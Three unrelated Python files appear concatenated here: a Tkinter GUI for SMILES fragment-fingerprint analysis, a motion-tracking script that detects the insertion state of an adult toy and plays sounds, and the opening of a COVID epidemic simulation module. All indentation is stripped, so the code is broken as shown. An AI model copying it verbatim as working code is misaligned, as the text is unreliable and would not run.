self.iconbitmap(r"gui\smash\icon.ico")
def readFile(self, file, **kwgrs):
extendName = os.path.splitext(file)[1]
if extendName == '.csv':
data = pd.read_csv(file, **kwgrs)
elif extendName == '.txt':
data = pd.read_csv(file, sep='\t', **kwgrs)
else:
data = pd.read_excel(file, **kwgrs)
return data
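# Usage sketch (hypothetical file name): the reader dispatches on the extension, so
#   data = self.readFile("molecules.txt", nrows=100)
# is parsed as a tab-separated table, while .csv / .xlsx files go through
# pd.read_csv / pd.read_excel with the same keyword arguments.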
# print(self.data)
def main_thread(self, func, args=()):
self.thread_run = Thread(target=func, args=args)
self.thread_run.setDaemon(True)
self.thread_run.start()
def stop_run(self):
self.thread_run_stop.set()
self.thread_run.join()
self.thread_run = None
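# Usage sketch: self.main_thread(self.main) runs the calculation in a daemon thread so the
# Tk mainloop stays responsive; stop_run() sets the Event and joins the worker (the worker
# is expected to check self.thread_run_stop periodically).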
def downloadRes(self, data, datype, preview=True, index=False, **kwgrs):
if preview:
self.previewRes(data, datype)
if datype == 'df':
savefile = asksaveasfilename(filetypes=(("CSV file", "*.csv*"), ))
if savefile:
try:
data.to_csv(savefile, index=index, **kwgrs)
except PermissionError:
messagebox.showerror(
title='Error!', message="Permission Denied!!!")
else:
showinfo('Succeeded', 'file saved')
else:
pass
elif datype == 'HTML':
savefile = asksaveasfilename(
filetypes=(("Html file", "*.html*"), ))
if savefile:
try:
self.model.savePvalue(data, savefile)
except PermissionError:
messagebox.showerror(
title='Error!', message="Permission Denied!!!")
else:
showinfo('Succeeded', 'file saved')
else:
pass
else:
savefile = asksaveasfilename(
filetypes=(("pkl file", "*.pkl*"), ))
if savefile:
try:
self.model.saveModel(savefile)
except PermissionError:
messagebox.showerror(
title='Error!', message="Permission Denied!!!")
else:
showinfo('Succeeded', 'file saved')
else:
pass
def previewRes(self, data, datype=None, display=5):
self.previewPad['state'] = 'normal'
self.previewPad.delete(1.0, tk.END)
if datype == 'df' or datype == 'HTML':
data = data.head(display)
self.previewPad.insert(tk.END, data.to_string(
max_cols=10, justify='center'))
self.previewPad['state'] = 'disabled'
else:
self.previewPad.insert(tk.END, self.kwgrs)
self.previewPad['state'] = 'disabled'
def preview(self):
self.process.destroy()
self.view = tk.Toplevel(self)
self.view.geometry('800x650+500+300')
lblsubMatrix = Label(self.view, text='subMatrix',
fg=self.fg, font=self.lblFont)
lblsubMatrix.place(x=100, y=80)
lblsubPvalue = Label(self.view, text='subPvalue',
fg=self.fg, font=self.lblFont)
lblsubPvalue.place(x=350, y=80)
lblsubHTML = Label(self.view, text='Model',
fg=self.fg, font=self.lblFont)
lblsubHTML.place(x=600, y=80)
btnPreviewMatrix = Button(self.view, text='Preview',
bg=self.btg,
font=('Times New Roman', 12),
width=8,
command=lambda: self.previewRes(
data=self.subMatrix.head(), datype='df', display=5)
)
btnPreviewMatrix.place(x=60, y=120)
btnDownloadMatrix = Button(self.view, text='Download',
bg=self.btg,
font=('Times New Roman', 12),
width=8,
command=lambda: self.main_thread(
self.downloadRes, args=(self.subMatrix, 'df', True, False)
))
btnDownloadMatrix.place(x=150, y=120)
btnPreviewPvalue = Button(self.view, text='Preview',
bg=self.btg,
font=('Times New Roman', 12),
width=8,
command=lambda: self.previewRes(
data=self.subPvalue.head(), datype='df', display=5),
)
btnPreviewPvalue.place(x=310, y=120)
btnDownloadPvalue = Button(self.view, text='Download',
bg=self.btg,
font=('Times New Roman', 12),
width=8,
command=lambda: self.main_thread(
self.downloadRes, args=(self.subPvalue, 'HTML')
))
btnDownloadPvalue.place(x=400, y=120)
btnPreviewModel = Button(self.view, text='Preview',
bg=self.btg,
font=('Times New Roman', 12),
width=8,
command=lambda: self.previewRes(
None, 'Model', 50)
)
btnPreviewModel.place(x=560, y=120)
btnDownloadModel = Button(self.view, text='Download',
bg=self.btg,
font=('Times New Roman', 12),
width=8,
command=lambda: self.main_thread(
self.downloadRes, args=(None, 'Model')
))
btnDownloadModel.place(x=650, y=120)
self.previewPad = Text(self.view, width=105, height=35,
wrap="none", borderwidth=0,
)
self.previewPad.place(x=20, y=160)
vscroll = Scrollbar(self.view, orient=tk.VERTICAL,
command=self.previewPad.yview)
self.previewPad['yscroll'] = vscroll.set
vscroll.pack(side=tk.RIGHT, fill=tk.Y)
hscroll = Scrollbar(self.view, orient=tk.HORIZONTAL,
command=self.previewPad.xview)
self.previewPad['xscroll'] = hscroll.set
hscroll.pack(side=tk.BOTTOM, fill=tk.X)
self.previewPad['state'] = 'disabled'
def main(self):
self.kwgrs = {'smiles_field': self.cmbSmiles.get(),
'label_field': self.cmbLabel.get(),
'fingerprint': self.cmbFP.get(),
'radius': self.Radius.get(),
'minRadius': self.minRadius.get(),
'minPath': self.minPath.get(),
'maxPath': self.maxPath.get(),
'folded': False,
'minRatio': self.minRatio.get(),
'minNum': self.minNum.get(),
'aimLabel': self.cmbAim.get(),
'n_jobs': self.n_jobs.get(),
'Bonferroni': self.Bonferroni.get(),
'minAccuracy': self.minAcc.get(),
'pValue': self.pValue.get()}
def add(words):
textPad['state'] = 'normal'
textPad.insert(tk.END, words)
textPad['state'] = 'disable'
self.process = tk.Toplevel(self)
self.process.geometry('400x300+500+200')
# self.process.resizable(0,0)
self.process.title('Running...')
lblnow = Label(self.process, text='Processing',
font=self.lblFont)
lblnow.place(x=135, y=40)
textPad = ScrolledText(self.process, width=48, height=13)
textPad.place(x=43, y=85)
textPad['state'] = 'disable'
btnNext = Button(self.process, text='Next', command=self.preview)
btnNext.place(x=320, y=265, width=50, height=25)
btnNext['state'] = 'disable'
btnCancel = Button(self.process, text='Cancel',
command=lambda: self.process.destroy())
btnCancel.place(x=260, y=265, width=50, height=25)
add('Load file... ')
data = self.readFile(self.filename)
self.model, self.subMatrix, self.subPvalue = getFingerprintRes(
textPad, data, **self.kwgrs)
time.sleep(1)
add('\nFinished!')
btnNext['state'] = 'normal'
def main_predict(self):
self.detailPad['state'] = 'normal'
self.detailPad.insert(tk.END, 'Waiting...\n')
self.detailPad['state'] = 'disable'
data = self.readFile(self.predFileName)
smis = data[self.cmbPredSmiles.get()].values
y_pred, self.predMatrix = predict(self.modelFileName, smis)
self.predMatrix['PredLabel'] = y_pred
self.btnSaveMatrix['state'] = 'normal'
self.detailPad['state'] = 'normal'
self.detailPad.insert(tk.END, 'Finished!!!\n')
self.detailPad['state'] = 'disable'
# print(self.predMatrix)
def creatTab(self):
tab_main = ttk.Notebook(self)
tab_main.place(relx=0.01, rely=0.01, relwidth=0.98, relheight=0.98)
self.fitTab = Frame(tab_main)
tab_main.add(self.fitTab, text='Calculate')
self.predTab = Frame(tab_main)
tab_main.add(self.predTab, text='Predict')
def createWidgets(self):
def getFileName():
self.txtFile['state'] = 'normal'
self.txtFile.delete(0, tk.END)
self.filename = askopenfilename(
filetypes=(("csv file", "*.csv*"),
("Excel file", "*.xlsx*;*.xls*"),
("Text file", "*.txt*")))
if self.filename:
self.txtFile.insert(tk.END, self.filename)
data = self.readFile(self.filename, nrows=0)
self.cols = list(data.columns)
self.cmbSmiles["values"] = self.cols
self.cmbLabel["values"] = self.cols
self.cmbSmiles['state'] = 'readonly'
# self.cmbLabel['state'], self.cmbAim['state'],
# self.cmbFP['state'] = ['readonly']*4
else:
disable()
self.txtFile['state'] = 'readonly'
def _changesmiles(*args):
self.cmbLabel['state'] = 'readonly'
def chooseAimLabel(*args):
self.cmbAim['state'] = 'readonly'
self.cmbFP['state'] = 'readonly'
self.cmbAim.set('')
data = self.readFile(self.filename, usecols=[self.cmbLabel.get()])
labels = list(set(data.iloc[:, 0]))
self.cmbAim['values'] = labels
self.cmbAim.current(1)
# def ignorenBits(*args):
# if self.Folded.get():
# txtnBits['state'] = 'normal'
# else:
# txtnBits['state'] = 'disable'
def disable(*args):
txtminRadius['state'], txtRadius['state'], txtminPath['state'],\
txtmaxPath['state'], txtminNum['state'], txtminRatio['state'],\
txtPvalue['state'], txtnjobs['state'], btnRun['state'],\
txtAcc['state'], cmbBon['state'] = ['disable']*11
self.cmbSmiles['state'], self.cmbLabel['state'], self.cmbAim['state'],\
self.cmbFP['state'] = ['disable']*4
def changestate(*args):
txtminNum['state'], txtminRatio['state'], txtPvalue['state'],\
txtnjobs['state'], btnRun['state'], txtAcc['state'] = [
'normal']*6
cmbBon['state'] = 'readonly'
if self.cmbFP.get() == 'Circular':
# cmbFolded['state'] = 'readonly'
# ignorenBits()
txtminRadius['state'], txtRadius['state'] = ['normal']*2
txtminPath['state'], txtmaxPath['state'] = ['disable']*2
elif self.cmbFP.get() == 'Path':
# cmbFolded['state'] = 'normal'
# ignorenBits()
txtminRadius['state'], txtRadius['state'] = ['disable']*2
txtminPath['state'], txtmaxPath['state'] = ['normal']*2
elif self.cmbFP.get() == 'Function Group':
txtminRadius['state'], txtRadius['state'],\
txtminPath['state'], txtmaxPath['state'] = ['disable']*4
# global image
# image = tk.PhotoImage(file='logo.gif')
# imgLabel = Label(self, image=image).place(x=170,y=20)
###################### Select File Module #######################
color = '#ffab66'
bbg = Label(self.fitTab, bg=color,
width=500, height=4)
bbg.place(x=0, y=0)
lblFile = Label(self.fitTab, text='>>> Select the file',
font=self.lblFont, bg=color,
fg='#b70131')
lblFile.place(x=5, y=10)
self.txtFile = Entry(self.fitTab, width=60)
self.txtFile.place(x=7, y=35)
self.txtFile['state'] = 'readonly'
btnGetFile = Button(self.fitTab, text='Browse...',
command=getFileName,
bg='#66baff',
width=18)
btnGetFile.place(x=440, y=30)
####################### Select File Module #######################
####################### Select Aim Field Module #######################
color = '#ffb97f'
bbg = Label(self.fitTab, bg=color,
width=500, height=4)
bbg.place(x=0, y=74)
lblField = Label(self.fitTab, text='>>> Select related field',
font=self.lblFont, bg=color, fg=self.fg)
lblField.place(x=0, y=74)
lblSmiles = Label(self.fitTab, text='SMILES',
font=('Times New Roman', 12),
bg=color)
lblSmiles.place(x=20, y=105)
self.cmbSmiles = ttk.Combobox(self.fitTab, width=12)
self.cmbSmiles.place(x=85, y=105)
self.cmbSmiles.bind("<<ComboboxSelected>>", _changesmiles)
lbllabel = Label(self.fitTab, text='Label',
font=('Times New Roman', 13),
bg=color)
lbllabel.place(x=210, y=105)
self.cmbLabel = ttk.Combobox(self.fitTab, width=12)
self.cmbLabel.place(x=260, y=105)
self.cmbLabel.bind("<<ComboboxSelected>>", chooseAimLabel)
lbllabel = Label(self.fitTab, text='Aim Label',
font=('Times New Roman', 13),
bg=color)
lbllabel.place(x=385, y=105)
self.cmbAim = ttk.Combobox(self.fitTab, width=12)
self.cmbAim.place(x=468, y=105)
####################### Select Aim Field Module #######################
####################### Select Fragment Type #######################
color = '#ffc799'
bbg = Label(self.fitTab, bg=color,
width=45, height=10)
bbg.place(x=0, y=140)
lblFPM = Label(self.fitTab, text=">>> Adjust fragment parameter",
font=self.lblFont, bg=color, fg=self.fg)
lblFPM.place(x=0, y=140)
lblFP = Label(self.fitTab, text='Fragment Type',
font=('Times New Roman', 12),
bg=color)
lblFP.place(x=15, y=180)
self.cmbFP = ttk.Combobox(self.fitTab, width=14)
self.cmbFP['values'] = ['Circular', 'Path', 'Function Group']
self.cmbFP.place(x=120, y=180)
self.cmbFP['state'] = "readonly"
self.cmbFP.bind("<<ComboboxSelected>>", changestate)
####################### Select Fragment Type #######################
        ####################### Adjust Fingerprint Param Module #######################
lblminRadius = Label(self.fitTab, text='minRadius', bg=color,
font=('Times New Roman', 13))
lblminRadius.place(x=15, y=220)
self.minRadius = tk.IntVar(value=1)
txtminRadius = Entry(self.fitTab, width=5, textvariable=self.minRadius)
txtminRadius.place(x=95, y=220)
lblRadius = Label(self.fitTab, text='maxRadius', bg=color,
font=('Times New Roman', 13))
lblRadius.place(x=155, y=220)
self.Radius = tk.IntVar(value=2)
txtRadius = Entry(self.fitTab, width=5, textvariable=self.Radius)
txtRadius.place(x=235, y=220)
lblminPath = Label(self.fitTab, text='minPath', bg=color,
font=('Times New Roman', 13))
lblminPath.place(x=15, y=275)
self.minPath = tk.IntVar(value=1)
txtminPath = Entry(self.fitTab, width=5, textvariable=self.minPath)
txtminPath.place(x=95, y=275)
lblmaxPath = Label(self.fitTab, text='maxPath', bg=color,
font=('Times New Roman', 13))
lblmaxPath.place(x=155, y=275)
self.maxPath = tk.IntVar(value=7)
txtmaxPath = Entry(self.fitTab, width=5, textvariable=self.maxPath)
txtmaxPath.place(x=235, y=275)
        ####################### Adjust Fingerprint Param Module #######################
####################### Adjust Running Param Module#######################
color = '#ffd5b2'
bbg = Label(self.fitTab, bg=color,
width=45, height=10)
bbg.place(x=310, y=140)
lblRP = Label(self.fitTab, text='>>> Adjust running parameter',
bg=color, fg=self.fg, font=self.lblFont)
lblRP.place(x=310, y=140)
lblminNum = Label(self.fitTab, text='minNum', bg=color,
font=('Times New Roman', 13))
lblminNum.place(x=320, y=180)
self.minNum = tk.IntVar(value=5)
txtminNum = Entry(self.fitTab, width=7, textvariable=self.minNum)
txtminNum.place(x=390, y=180)
lblRatio = Label(self.fitTab, text='minRatio', bg=color,
font=('Times New Roman', 13))
# lblRatio.place(x=450, y=180)
self.minRatio = tk.DoubleVar(value=0.4)
txtminRatio = Entry(self.fitTab, width=7, textvariable=self.minRatio)
# txtminRatio.place(x=520, y=180)
lblPvalue = Label(self.fitTab, text='p-value', bg=color,
font=('Times New Roman', 13))
lblPvalue.place(x=320, y=230)
self.pValue = tk.DoubleVar(value=0.05)
txtPvalue = Entry(self.fitTab, width=7, textvariable=self.pValue)
txtPvalue.place(x=390, y=230)
lblAcc = Label(self.fitTab, text='minAcc', bg=color,
font=('Times New Roman', 13))
lblAcc.place(x=450, y=180)
self.minAcc = tk.DoubleVar(value=0.70)
txtAcc = Entry(self.fitTab, width=7, textvariable=self.minAcc)
txtAcc.place(x=520, y=180)
lblnjobs = Label(self.fitTab, text='n_jobs', bg=color,
font=('Times New Roman', 13))
lblnjobs.place(x=390, y=280)
self.n_jobs = tk.IntVar(value=1)
txtnjobs = Entry(self.fitTab, width=7, textvariable=self.n_jobs)
txtnjobs.place(x=450, y=280)
lblBon = Label(self.fitTab, text='Bonferroni',
font=('Times New Roman', 12),
bg=color)
lblBon.place(x=450, y=230)
self.Bonferroni = tk.BooleanVar()
cmbBon = ttk.Combobox(self.fitTab, width=4,
textvariable=self.Bonferroni)
cmbBon['values'] = [False, True]
cmbBon.current(0)
cmbBon.place(x=520, y=230)
####################### Adjust Running Param Module#######################
####################### Run Module#######################
color = '#fff1e5'
bbg = Label(self.fitTab, bg=color,
width=100, height=10)
bbg.place(x=0, y=310)
btnRun = Button(self.fitTab, text='Calculate',
font=('Times New Roman', 16),
bg='#e5f3ff', width=10, height=1,
command=lambda: self.main_thread(self.main),
# command=self.preview
)
btnRun.place(x=210, y=320)
disable()
def createPredictWidgets(self):
#####################################################################
# Prediction
# Prediction
# Prediction
# Prediction
#####################################################################
def getFileName():
self.txtPredFile['state'] = 'normal'
self.txtPredFile.delete(0, tk.END)
self.predFileName = askopenfilename(
filetypes=(("csv file", "*.csv*"),
("Excel file", "*.xlsx*;*.xls*"),
("Text file", "*.txt*")))
if self.predFileName:
self.txtPredFile.insert(tk.END, self.predFileName)
data = self.readFile(self.predFileName, nrows=0)
self.predCols = list(data.columns)
self.cmbPredSmiles["values"] = self.predCols
self.cmbPredSmiles['state'] = 'readonly'
# else:
# disable()
self.txtPredFile['state'] = 'readonly'
def getModelFileName():
self.txtModelFile['state'] = 'normal'
self.txtModelFile.delete(0, tk.END)
self.modelFileName = askopenfilename(
filetypes=(("pbz2 file", "*.pbz2*"),))
if self.modelFileName:
self.txtModelFile.insert(tk.END, self.modelFileName)
# data = self.readFile(self.PvFileName, nrows=0)
# self.pvCols = list(data.columns)
# self.cmbPvalue["values"] = self.pvCols
# self.cmbPvalue['state'] = 'readonly'
# else:
# disable()
self.txtModelFile['state'] = 'readonly'
color = '#ffab66'
bbg = Label(self.predTab, bg=color,
width=500, height=4)
bbg.place(x=0, y=0)
lblPredFile = Label(self.predTab, text='>>> Select the file and SMILES field',
font=self.lblFont, bg=color,
fg='#b70131')
lblPredFile.place(x=0, y=10)
self.txtPredFile = Entry(self.predTab, width=50)
self.txtPredFile.place(x=7, y=35)
self.txtPredFile['state'] = 'readonly'
btnGetPredFile = Button(self.predTab, text='Browse...',
command=getFileName,
bg='#66baff',
width=7)
btnGetPredFile.place(x=365, y=30)
self.cmbPredSmiles = ttk.Combobox(self.predTab, width=12)
self.cmbPredSmiles.place(x=450, y=30)
self.cmbPredSmiles['state'] = 'disable'
color = '#ffb97f'
bbg = Label(self.predTab, bg=color,
width=500, height=4)
bbg.place(x=0, y=74)
lblModelFile = Label(self.predTab, text='>>> Select the model file',
font=self.lblFont, bg=color,
fg='#b70131')
lblModelFile.place(x=0, y=74)
self.txtModelFile = Entry(self.predTab, width=70)
self.txtModelFile.place(x=7, y=110)
self.txtModelFile['state'] = 'readonly'
btnGetModelFile = Button(self.predTab, text='Browse...',
command=getModelFileName,
bg='#66baff',
width=7)
btnGetModelFile.place(x=505, y=105)
color = '#ffd5b2'
bbg = Label(self.predTab, bg=color,
width=500, height=7)
bbg.place(x=0, y=147)
btnPredict = Button(self.predTab, text='Predict',
command=lambda: self.main_thread(
self.main_predict),
bg='#66baff',
width=7)
btnPredict.place(x=250, y=165)
self.btnSaveMatrix = Button(self.predTab, text='Save Predict Result',
command=lambda: self.main_thread(
self.downloadRes, args=(self.predMatrix, 'df', False, False)
),
bg='#66baff',
width=20)
self.btnSaveMatrix.place(x=210, y=220)
self.btnSaveMatrix['state'] = 'disable'
self.detailPad = Text(self.predTab, width=30, height=5,
wrap="none", borderwidth=0,
)
self.detailPad.place(x=170, y=280)
if '__main__' == __name__:
mp.freeze_support()
gui = SmashGui()
gui.mainloop()
|
motion_recognizer.py
|
from collections import deque
import enum
import time
import os
import numpy as np
from skspatial.objects import Line
from skspatial.objects import Points
class MotionLineDetector:
MAX_POINT = 60
def __init__(self):
self.past_points = deque([])
self.last_time = None
def get_next_line(self, point):
self.past_points.append(point)
if len(self.past_points) > self.MAX_POINT:
self.past_points.popleft()
        now = time.time()
        # Use the interval since the previous sample; overwriting last_time before the
        # speed check below made that check divide by a near-zero interval.
        elapsed = now - self.last_time if self.last_time is not None else 0.0
        self.last_time = now
if len(self.past_points) == self.MAX_POINT:
max_movement = 0
for pt2, pt1 in zip(list(self.past_points)[1:], list(self.past_points)[:-1]):
movement = np.linalg.norm(pt2 - pt1)
if movement > max_movement:
max_movement = movement
            # Skip the line fit when the fastest recent frame-to-frame movement is too slow.
            if elapsed > 0 and (max_movement / elapsed) < 0.1:
return None
points = Points(list(self.past_points))
line_fit = Line.best_fit(points)
direction = np.array(line_fit.direction)
            # Define this side as the positive direction so the sign convention stays stable.
if direction[0] < 0:
direction *= -1
direction = direction / np.linalg.norm(direction)
return direction
else:
return None
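# Illustrative usage sketch (not part of the original module): feed one 3D point per frame;
# a unit direction vector is returned once MAX_POINT points are buffered and the recent
# motion is fast enough, otherwise None. `points` is an assumed name for this example.
def _example_motion_line_loop(points):
    detector = MotionLineDetector()
    directions = []
    for point in points:
        direction = detector.get_next_line(np.asarray(point, dtype=float))
        if direction is not None:
            directions.append(direction)
    return directions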
from pydub import AudioSegment
from pydub.playback import play
import threading
import glob
# Load mp3s.
songs = [AudioSegment.from_mp3(sound_path) for sound_path in glob.glob("sounds/*.mp3")]
def play_ex():
song_index = np.random.randint(0, len(songs))
play(songs[song_index])
class OnahoStateEstimator:
MAX_FRAME = 30 * 2
WAIT_TIME = 30
def __init__(self):
self.previous_center = None
self.current_position = 0
self.recent_positions = deque([])
self.remaining_wait = 0
def add_current_state(self, line, center):
if self.previous_center is not None:
move_distance = np.dot(line, center - self.previous_center)
self.current_position += move_distance
self.previous_center = center
if len(self.recent_positions) == self.MAX_FRAME:
self.recent_positions.popleft()
self.recent_positions.append(self.current_position)
min_pos = min(self.recent_positions)
max_pos = max(self.recent_positions)
rate = (max_pos - min_pos) * 0.5
print(max_pos - min_pos)
if (max_pos - min_pos) > 0.05:
if min_pos > self.current_position - rate and self.remaining_wait <= 0:
t = threading.Thread(target=play_ex)
t.start()
self.remaining_wait = 30
self.remaining_wait -= 1
from dataclasses import dataclass
@dataclass
class VelocityBasedInsertionEstimatorOption:
forward_backward_velocity_threashold: float = 0.35
no_motion_velocity_threashold: float = 0.20
sound_wait_time: int = 5
class VelocityBasedInsertionEstimator:
class OnahoState(enum.Enum):
INSERTING = "inserting"
OUTGOING = "outgoing"
NO_MOTION = "no_motion"
def __init__(self, sound_dir, option=VelocityBasedInsertionEstimatorOption()):
self.previous_center = None
self.previous_time = None
self.remaining_wait = 0
self.state = self.OnahoState.NO_MOTION
self.option = option
self.songs = [
AudioSegment.from_mp3(sound_path)
for sound_path in glob.glob(os.path.join(sound_dir, "*.mp3"))]
# For Debug.
self.velocities = []
self.timestamps = []
def play_ex(self):
song_index = np.random.randint(0, len(self.songs))
play(self.songs[song_index])
def add_current_state(self, line, center):
        # Skip the first frame, when there is no previous state yet.
if self.previous_center is not None and self.previous_time is not None:
delta_t = time.time() - self.previous_time
move_distance = np.dot(line, center - self.previous_center)
velocity = move_distance / delta_t
if velocity > self.option.forward_backward_velocity_threashold:
self.state = self.OnahoState.INSERTING
elif velocity < -self.option.forward_backward_velocity_threashold:
self.state = self.OnahoState.OUTGOING
else:
if abs(velocity) < self.option.no_motion_velocity_threashold:
if self.state == self.OnahoState.INSERTING:
if self.remaining_wait <= 0:
t = threading.Thread(target=self.play_ex)
t.start()
self.remaining_wait = self.option.sound_wait_time
print(self.state)
self.state = self.OnahoState.NO_MOTION
self.velocities.append(velocity)
self.timestamps.append(time.time())
self.previous_center = center
self.previous_time = time.time()
self.remaining_wait -= 1
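# Illustrative usage sketch (not part of the original module): one estimator per tracked
# object; each frame supply the fitted motion-line direction and the current marker center.
# `frames` and `sound_dir` are assumed names for this example, not identifiers used elsewhere.
def _example_velocity_estimator_loop(frames, sound_dir="sounds"):
    estimator = VelocityBasedInsertionEstimator(sound_dir)
    for line, center in frames:
        estimator.add_current_state(np.asarray(line, dtype=float),
                                    np.asarray(center, dtype=float))
    return estimator.velocities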
|
main.py
|
"""The main module handling the simulation"""
import copy
import datetime
import logging
import os
import pickle
import queue
import random
import sys
import threading
import warnings
from functools import lru_cache
from pprint import pformat # TODO set some defaults for width/etc with partial?
import networkx as nx
import numpy as np
import pandas as pd
import tqdm
from ..numerical_libs import reimport_numerical_libs, use_cupy, xp, xp_ivp
from ..util.distributions import approx_mPERT_sample, truncnorm
from ..util.util import TqdmLoggingHandler, _banner
from .arg_parser_model import parser
from .estimation import estimate_doubling_time, estimate_Rt
from .graph import buckyGraphData
from .npi import get_npi_params
from .parameters import buckyParams
from .state import buckyState
# suppress pandas warning caused by pyarrow
warnings.simplefilter(action="ignore", category=FutureWarning)
# TODO we allow a lot of div-by-0 and then check for NaNs later; we should probably refactor that
warnings.simplefilter(action="ignore", category=RuntimeWarning)
# TODO move to a new file and add some more exception types
class SimulationException(Exception):
"""A generic exception to throw when there's an error related to the simulation"""
pass # pylint: disable=unnecessary-pass
@lru_cache(maxsize=None)
def get_runid(): # TODO move to util and rename to timeid or something
"""Gets a UUID based of the current datatime and caches it"""
dt_now = datetime.datetime.now()
return str(dt_now).replace(" ", "__").replace(":", "_").split(".")[0]
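# For example, a run started at 2021-01-15 10:30:45.123456 gets the ID
# '2021-01-15__10_30_45' (illustrative values).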
def frac_last_n_vals(arr, n, axis=0, offset=0):  # TODO assumes values come from the end of the array; move to util
"""Return the last n values along an axis of an array; if n is a float, include the fractional amount of the int(n)-1 element"""
int_slice_ind = (
[slice(None)] * (axis)
+ [slice(-int(n + offset), -int(xp.ceil(offset)) or None)]
+ [slice(None)] * (arr.ndim - axis - 1)
)
ret = arr[int_slice_ind]
# handle fractional element before the standard slice
if (n + offset) % 1:
frac_slice_ind = (
[slice(None)] * (axis)
+ [slice(-int(n + offset + 1), -int(n + offset))]
+ [slice(None)] * (arr.ndim - axis - 1)
)
ret = xp.concatenate((((n + offset) % 1) * arr[frac_slice_ind], ret), axis=axis)
# handle fractional element after the standard slice
if offset % 1:
frac_slice_ind = (
[slice(None)] * (axis)
+ [slice(-int(offset + 1), -int(offset) or None)]
+ [slice(None)] * (arr.ndim - axis - 1)
)
ret = xp.concatenate((ret, (1.0 - (offset % 1)) * arr[frac_slice_ind]), axis=axis)
return ret
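# Illustrative note (assuming xp behaves like numpy here): for arr = xp.arange(10.),
# frac_last_n_vals(arr, 2.5) returns [0.5 * arr[-3], arr[-2], arr[-1]] == [3.5, 8., 9.],
# i.e. the trailing 2.5 "days" of history with the oldest element weighted fractionally.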
class buckyModelCovid:
"""Class that handles one full simulation (both time integration and managing MC states)"""
def __init__(
self,
debug=False,
sparse_aij=False,
t_max=None,
graph_file=None,
par_file=None,
npi_file=None,
disable_npi=False,
reject_runs=False,
):
"""Initialize the class, do some bookkeeping and read in the input graph"""
self.debug = debug
self.sparse = sparse_aij # we can default to none and autodetect
        # w/ override (maybe when #adm2 > 5k and some sparsity criteria?)
# Integrator params
self.dt = 1.0 # time step for model output (the internal step is adaptive...)
self.t_max = t_max
self.run_id = get_runid()
logging.info(f"Run ID: {self.run_id}")
self.npi_file = npi_file
self.disable_npi = disable_npi
self.reject_runs = reject_runs
self.output_dates = None
# COVID/model params from par file
self.bucky_params = buckyParams(par_file)
self.consts = self.bucky_params.consts
self.dists = self.bucky_params.dists
self.g_data = self.load_graph(graph_file)
def update_params(self, update_dict):
self.bucky_params.update_params(update_dict)
self.consts = self.bucky_params.consts
self.dists = self.bucky_params.dists
def load_graph(self, graph_file):
"""Load the graph data and calculate all the variables that are static across MC runs"""
        # TODO refactor to just have this return g_data
# (it's currently the code block that used to be at the top of reset)
logging.info("loading graph")
with open(graph_file, "rb") as f:
G = pickle.load(f) # nosec
# Load data from input graph
        # TODO we should go through and replace lots of math using self.g_data.* with functions in buckyGraphData
g_data = buckyGraphData(G, self.sparse)
"""
if "IFR" in G.nodes[list(G.nodes.keys())[0]]:
logging.info("Using ifr from graph")
self.use_G_ifr = True
node_IFR = nx.get_node_attributes(G, "IFR")
self.ifr = xp.asarray((np.vstack(list(node_IFR.values()))).T)
else:
self.use_G_ifr = False
"""
# Make contact mats sym and normalized
self.contact_mats = G.graph["contact_mats"]
if self.debug:
logging.debug(f"graph contact mats: {G.graph['contact_mats'].keys()}")
for mat in self.contact_mats:
c_mat = xp.array(self.contact_mats[mat])
c_mat = (c_mat + c_mat.T) / 2.0
self.contact_mats[mat] = c_mat
        # remove all_locations so we can sum over them ourselves
if "all_locations" in self.contact_mats:
del self.contact_mats["all_locations"]
# Remove unknown contact mats
valid_contact_mats = ["home", "work", "other_locations", "school"]
self.contact_mats = {k: v for k, v in self.contact_mats.items() if k in valid_contact_mats}
self.Cij = xp.vstack([self.contact_mats[k][None, ...] for k in sorted(self.contact_mats)])
# Get stratified population (and total)
self.Nij = g_data.Nij
self.Nj = g_data.Nj
self.n_age_grps = self.Nij.shape[0] # TODO factor out
n_nodes = self.Nij.shape[-1] # TODO factor out
self.first_date = datetime.date.fromisoformat(G.graph["start_date"])
# fill in npi_params either from file or as ones
self.npi_params = get_npi_params(g_data, self.first_date, self.t_max, self.npi_file, self.disable_npi)
if self.npi_params["npi_active"]:
self.Cij = xp.broadcast_to(self.Cij, (n_nodes,) + self.Cij.shape)
self.npi_params["contact_weights"] = self.npi_params["contact_weights"][..., None, None]
else:
self.Cij = xp.sum(self.Cij, axis=0)
self.Cij = (self.Cij + self.Cij.T) / 2.0
self.Cij = self.Cij / xp.sum(self.Cij, axis=1)
self.adm0_cfr_reported = None
self.adm1_cfr_reported = None
self.adm2_cfr_reported = None
# If HHS hospitalization data is on the graph, use it to rescale initial H counts and CHR
self.rescale_chr = "hhs_data" in G.graph
if self.rescale_chr:
self.adm1_current_hosp = xp.zeros((g_data.max_adm1 + 1,), dtype=float)
hhs_data = G.graph["hhs_data"].reset_index()
hhs_data = (
hhs_data.set_index("date")
.sort_index()
.groupby("adm1")
.rolling(7) # , center=True)
.mean()
.drop(columns="adm1")
.reset_index()
)
hhs_curr_data = hhs_data.loc[hhs_data.date == str(self.first_date)]
hhs_curr_data = hhs_curr_data.set_index("adm1").sort_index()
tot_hosps = (
hhs_curr_data.total_adult_patients_hospitalized_confirmed_covid
+ hhs_curr_data.total_pediatric_patients_hospitalized_confirmed_covid
)
self.adm1_current_hosp[tot_hosps.index.to_numpy()] = tot_hosps.to_numpy()
if self.debug:
logging.debug("Current hospitalizations: " + pformat(self.adm1_current_hosp))
# Estimate the recent CFR during the period covered by the historical data
cfr_delay = 15 # TODO This should come from CDC and Nij
n_cfr = 7
# last_cases = g_data.rolling_cum_cases[-cfr_delay-n_cfr:-cfr_delay] - g_data.rolling_cum_cases[0]
# last_deaths = g_data.rolling_cum_deaths[-1] - g_data.rolling_cum_deaths[cfr_delay]
last_cases = (
g_data.rolling_cum_cases[-cfr_delay - n_cfr : -cfr_delay] - g_data.rolling_cum_cases[-cfr_delay - n_cfr - 1]
)
last_deaths = g_data.rolling_cum_deaths[-n_cfr:] - g_data.rolling_cum_deaths[-n_cfr - 1]
adm1_cases = g_data.sum_adm1(last_cases.T)
adm1_deaths = g_data.sum_adm1(last_deaths.T)
adm1_cfr = adm1_deaths / adm1_cases
# take harmonic mean over n days
self.adm1_current_cfr = 1.0 / xp.mean(1.0 / adm1_cfr, axis=1)
# from IPython import embed
# embed()
chr_delay = 6 # TODO This should come from I_TO_H_TIME and Nij
n_chr = 7
tmp = hhs_data.loc[hhs_data.date > str(self.first_date - datetime.timedelta(days=n_chr))]
tmp = tmp.loc[tmp.date <= str(self.first_date)]
tmp = tmp.set_index(["adm1", "date"]).sort_index()
